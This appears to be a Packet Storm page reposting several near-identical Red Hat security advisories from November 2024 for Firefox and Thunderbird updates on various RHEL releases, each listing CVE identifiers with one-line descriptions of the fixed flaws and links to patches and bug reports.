CVE-2024-47668, CVE-2024-47669Package Information:  https://launchpad.net/ubuntu/+source/linux/5.4.0-200.220  https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1139.148  https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1102.106  https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1082.87

Ubuntu Security Notice USN-7088-1

Red Hat Security Advisory 2024-8729-03 - An update for firefox is now available for Red Hat Enterprise Linux 8. Issues addressed include cross site scripting, denial of service, spoofing, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8729.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: firefox security update  
Advisory ID:        RHSA-2024:8729-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8729  
Issue date:         2024-11-01  
Revision:           03  
CVE Names:          CVE-2024-10458  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

Security Fix(es):

* firefox: thunderbird: History interface could have been used to cause a Denial of Service condition in the browser (CVE-2024-10464)

* firefox: thunderbird: XSS due to Content-Disposition being ignored in multipart/x-mixed-replace response (CVE-2024-10461)

* firefox: thunderbird: Permission leak via embed or object elements (CVE-2024-10458)

* firefox: thunderbird: Use-after-free in layout with accessibility (CVE-2024-10459)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 132, Thunderbird 132, Firefox ESR 128.4, and Thunderbird 128.4 (CVE-2024-10467)

* firefox: thunderbird: Clipboard \"paste\" button persisted across tabs (CVE-2024-10465)

* firefox: DOM push subscription message could hang Firefox (CVE-2024-10466)

* firefox: thunderbird: Cross origin video frame leak (CVE-2024-10463)

* firefox: thunderbird: Origin of permission prompt could be spoofed by long URL (CVE-2024-10462)

* firefox: thunderbird: Confusing display of origin for external protocol handler prompt (CVE-2024-10460)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-10458

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2322424  
https://bugzilla.redhat.com/show_bug.cgi?id=2322425  
https://bugzilla.redhat.com/show_bug.cgi?id=2322428  
https://bugzilla.redhat.com/show_bug.cgi?id=2322429  
https://bugzilla.redhat.com/show_bug.cgi?id=2322433  
https://bugzilla.redhat.com/show_bug.cgi?id=2322434  
https://bugzilla.redhat.com/show_bug.cgi?id=2322438  
https://bugzilla.redhat.com/show_bug.cgi?id=2322439  
https://bugzilla.redhat.com/show_bug.cgi?id=2322440  
https://bugzilla.redhat.com/show_bug.cgi?id=2322444

Red Hat Security Advisory 2024-8729-03

Red Hat Security Advisory 2024-8728-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include cross site scripting, denial of service, spoofing, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8728.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: thunderbird security update  
Advisory ID:        RHSA-2024:8728-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8728  
Issue date:         2024-11-01  
Revision:           03  
CVE Names:          CVE-2024-10458  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* firefox: thunderbird: History interface could have been used to cause a Denial of Service condition in the browser (CVE-2024-10464)

* firefox: thunderbird: XSS due to Content-Disposition being ignored in multipart/x-mixed-replace response (CVE-2024-10461)

* firefox: thunderbird: Permission leak via embed or object elements (CVE-2024-10458)

* firefox: thunderbird: Use-after-free in layout with accessibility (CVE-2024-10459)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 132, Thunderbird 132, Firefox ESR 128.4, and Thunderbird 128.4 (CVE-2024-10467)

* firefox: thunderbird: Clipboard \"paste\" button persisted across tabs (CVE-2024-10465)

* firefox: DOM push subscription message could hang Firefox (CVE-2024-10466)

* firefox: thunderbird: Cross origin video frame leak (CVE-2024-10463)

* firefox: thunderbird: Origin of permission prompt could be spoofed by long URL (CVE-2024-10462)

* firefox: thunderbird: Confusing display of origin for external protocol handler prompt (CVE-2024-10460)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-10458

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2322424  
https://bugzilla.redhat.com/show_bug.cgi?id=2322425  
https://bugzilla.redhat.com/show_bug.cgi?id=2322428  
https://bugzilla.redhat.com/show_bug.cgi?id=2322429  
https://bugzilla.redhat.com/show_bug.cgi?id=2322433  
https://bugzilla.redhat.com/show_bug.cgi?id=2322434  
https://bugzilla.redhat.com/show_bug.cgi?id=2322438  
https://bugzilla.redhat.com/show_bug.cgi?id=2322439  
https://bugzilla.redhat.com/show_bug.cgi?id=2322440  
https://bugzilla.redhat.com/show_bug.cgi?id=2322444

Red Hat Security Advisory 2024-8728-03

Red Hat Security Advisory 2024-8727-03 - An update for firefox is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support. Issues addressed include cross site scripting, denial of service, spoofing, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8727.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: firefox security update  
Advisory ID:        RHSA-2024:8727-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8727  
Issue date:         2024-11-01  
Revision:           03  
CVE Names:          CVE-2024-10458  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

Security Fix(es):

* firefox: thunderbird: History interface could have been used to cause a Denial of Service condition in the browser (CVE-2024-10464)

* firefox: thunderbird: XSS due to Content-Disposition being ignored in multipart/x-mixed-replace response (CVE-2024-10461)

* firefox: thunderbird: Permission leak via embed or object elements (CVE-2024-10458)

* firefox: thunderbird: Use-after-free in layout with accessibility (CVE-2024-10459)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 132, Thunderbird 132, Firefox ESR 128.4, and Thunderbird 128.4 (CVE-2024-10467)

* firefox: thunderbird: Clipboard \"paste\" button persisted across tabs (CVE-2024-10465)

* firefox: DOM push subscription message could hang Firefox (CVE-2024-10466)

* firefox: thunderbird: Cross origin video frame leak (CVE-2024-10463)

* firefox: thunderbird: Origin of permission prompt could be spoofed by long URL (CVE-2024-10462)

* firefox: thunderbird: Confusing display of origin for external protocol handler prompt (CVE-2024-10460)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-10458

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2322424  
https://bugzilla.redhat.com/show_bug.cgi?id=2322425  
https://bugzilla.redhat.com/show_bug.cgi?id=2322428  
https://bugzilla.redhat.com/show_bug.cgi?id=2322429  
https://bugzilla.redhat.com/show_bug.cgi?id=2322433  
https://bugzilla.redhat.com/show_bug.cgi?id=2322434  
https://bugzilla.redhat.com/show_bug.cgi?id=2322438  
https://bugzilla.redhat.com/show_bug.cgi?id=2322439  
https://bugzilla.redhat.com/show_bug.cgi?id=2322440  
https://bugzilla.redhat.com/show_bug.cgi?id=2322444

Red Hat Security Advisory 2024-8727-03

Red Hat Security Advisory 2024-8726-03 - An update for firefox is now available for Red Hat Enterprise Linux 9. Issues addressed include cross site scripting, denial of service, spoofing, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8726.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: firefox security update  
Advisory ID:        RHSA-2024:8726-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8726  
Issue date:         2024-11-01  
Revision:           03  
CVE Names:          CVE-2024-10458  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

Security Fix(es):

* firefox: thunderbird: History interface could have been used to cause a Denial of Service condition in the browser (CVE-2024-10464)

* firefox: thunderbird: XSS due to Content-Disposition being ignored in multipart/x-mixed-replace response (CVE-2024-10461)

* firefox: thunderbird: Permission leak via embed or object elements (CVE-2024-10458)

* firefox: thunderbird: Use-after-free in layout with accessibility (CVE-2024-10459)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 132, Thunderbird 132, Firefox ESR 128.4, and Thunderbird 128.4 (CVE-2024-10467)

* firefox: thunderbird: Clipboard \"paste\" button persisted across tabs (CVE-2024-10465)

* firefox: DOM push subscription message could hang Firefox (CVE-2024-10466)

* firefox: thunderbird: Cross origin video frame leak (CVE-2024-10463)

* firefox: thunderbird: Origin of permission prompt could be spoofed by long URL (CVE-2024-10462)

* firefox: thunderbird: Confusing display of origin for external protocol handler prompt (CVE-2024-10460)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-10458

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2322424  
https://bugzilla.redhat.com/show_bug.cgi?id=2322425  
https://bugzilla.redhat.com/show_bug.cgi?id=2322428  
https://bugzilla.redhat.com/show_bug.cgi?id=2322429  
https://bugzilla.redhat.com/show_bug.cgi?id=2322433  
https://bugzilla.redhat.com/show_bug.cgi?id=2322434  
https://bugzilla.redhat.com/show_bug.cgi?id=2322438  
https://bugzilla.redhat.com/show_bug.cgi?id=2322439  
https://bugzilla.redhat.com/show_bug.cgi?id=2322440  
https://bugzilla.redhat.com/show_bug.cgi?id=2322444

Red Hat Security Advisory 2024-8726-03

Red Hat Security Advisory 2024-8725-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include cross site scripting, denial of service, spoofing, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8725.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: firefox security update  
Advisory ID:        RHSA-2024:8725-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8725  
Issue date:         2024-11-01  
Revision:           03  
CVE Names:          CVE-2024-10458  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

Security Fix(es):

* firefox: thunderbird: History interface could have been used to cause a Denial of Service condition in the browser (CVE-2024-10464)

* firefox: thunderbird: XSS due to Content-Disposition being ignored in multipart/x-mixed-replace response (CVE-2024-10461)

* firefox: thunderbird: Permission leak via embed or object elements (CVE-2024-10458)

* firefox: thunderbird: Use-after-free in layout with accessibility (CVE-2024-10459)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 132, Thunderbird 132, Firefox ESR 128.4, and Thunderbird 128.4 (CVE-2024-10467)

* firefox: thunderbird: Clipboard \"paste\" button persisted across tabs (CVE-2024-10465)

* firefox: DOM push subscription message could hang Firefox (CVE-2024-10466)

* firefox: thunderbird: Cross origin video frame leak (CVE-2024-10463)

* firefox: thunderbird: Origin of permission prompt could be spoofed by long URL (CVE-2024-10462)

* firefox: thunderbird: Confusing display of origin for external protocol handler prompt (CVE-2024-10460)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-10458

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2322424  
https://bugzilla.redhat.com/show_bug.cgi?id=2322425  
https://bugzilla.redhat.com/show_bug.cgi?id=2322428  
https://bugzilla.redhat.com/show_bug.cgi?id=2322429  
https://bugzilla.redhat.com/show_bug.cgi?id=2322433  
https://bugzilla.redhat.com/show_bug.cgi?id=2322434  
https://bugzilla.redhat.com/show_bug.cgi?id=2322438  
https://bugzilla.redhat.com/show_bug.cgi?id=2322439  
https://bugzilla.redhat.com/show_bug.cgi?id=2322440  
https://bugzilla.redhat.com/show_bug.cgi?id=2322444

Tag

#linux